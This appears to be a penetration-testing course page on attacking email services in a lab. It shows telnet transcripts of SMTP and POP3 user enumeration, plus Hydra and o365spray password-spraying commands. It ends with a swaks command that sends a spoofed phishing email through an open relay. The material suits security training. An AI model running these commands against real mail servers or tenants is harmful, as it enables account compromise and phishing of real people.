Email Services
Email servers are complex and usually require us to enumerate multiple servers, ports, and services. Furthermore, today most companies have their email services in the cloud with services such as Microsoft 365 or G-Suite. Therefore, our approach to attacking the email service depends on the service in use.
We can use the Mail eXchanger
(MX
) DNS record to identify a mail server
We can use tools such as host
or dig
and online websites such as MXToolbox to query information about the MX records:
host -t MX hackthebox.eu
dig mx plaintext.do | grep "MX" | grep -v ";"
host -t A mail1.inlanefreight.htb.
If we are targetting a custom mail server implementation such as inlanefreight.htb
, we can enumerate the following ports:
Port
Service
TCP/25
SMTP Unencrypted
TCP/143
IMAP4 Unencrypted
TCP/110
POP3 Unencrypted
TCP/465
SMTP Encrypted
TCP/587
SMTP Encrypted/STARTTLS
TCP/993
IMAP4 Encrypted
TCP/995
POP3 Encrypted
We can use Nmap
's default script -sC
option to enumerate those ports on the target system:
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 <IP>
Misconfigurations
Authentication
The SMTP server has different commands that can be used to enumerate valid usernames VRFY
, EXPN
, and RCPT TO
. If we successfully enumerate valid usernames, we can attempt to password spray, brute-forcing, or guess a valid password. So let's explore how those commands work.
VRFY
this command instructs the receiving SMTP server to check the validity of a particular email username. The server will respond, indicating if the user exists or not. This feature can be disabled.
telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
VRFY root
252 2.0.0 root
VRFY www-data
252 2.0.0 www-data
VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
EXPN
is similar to VRFY
, except that when used with a distribution list, it will list all users on that list. This can be a bigger problem than the VRFY
command since sites often have an alias such as "all."
telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
EXPN john
250 2.1.0 [email protected]
EXPN support-team
250 2.0.0 [email protected]
250 2.1.5 [email protected]
RCPT TO
identifies the recipient of the email message. This command can be repeated multiple times for a given message to deliver a single message to multiple recipients.
telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
MAIL FROM:[email protected]
it is
250 2.1.0 [email protected]... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
We can also use the POP3
protocol to enumerate users depending on the service implementation. For example, we can use the command USER
followed by the username, and if the server responds OK
. This means that the user exists on the server.
telnet 10.10.110.20 110
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready
USER julio
-ERR
USER john
+OK
Automatic enumeration
To automate our enumeration process, we can use a tool named smtp-user-enum. We can specify the enumeration mode with the argument -M
followed by VRFY
, EXPN
, or RCPT
, and the argument -U
with a file containing the list of users we want to enumerate. Depending on the server implementation and enumeration mode, we need to add the domain for the email address with the argument -D
. Finally, we specify the target with the argument -t
.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t <IP>
Cloud Enumeration
O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365)
Validating service
python3 o365spray.py --validate --domain msplaintext.xyz
Attempt to identify usernames.
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
Password Attacks
We can use Hydra
to perform a password spray or brute force against email services such as SMTP
, POP3
, or IMAP4
. First, we need to get a username list and a password list and specify which service we want to attack. Let us see an example for POP3
.
hydra -L users.txt -p 'Company01!' -f <IP> pop3
For cloud services we can try custom tools such as o365spray or MailSniper for Microsoft Office 365 or CredKing for Gmail or Okta.
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain <domain>
Protocol Specifics Attacks
An open relay is a Simple Mail Transfer Protocol (SMTP
) server, which is improperly configured and allows an unauthenticated email relay.
Open Relay
From an attacker's standpoint, we can abuse this for phishing by sending emails as non-existing users or spoofing someone else's email.
With the nmap smtp-open-relay
script, we can identify if an SMTP port allows an open relay.
nmap -p25 -Pn --script smtp-open-relay <IP>
Next, we can use any mail client to connect to the mail server and send our email.
swaks --from [email protected] --to [email protected] --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server <IP>
Last updated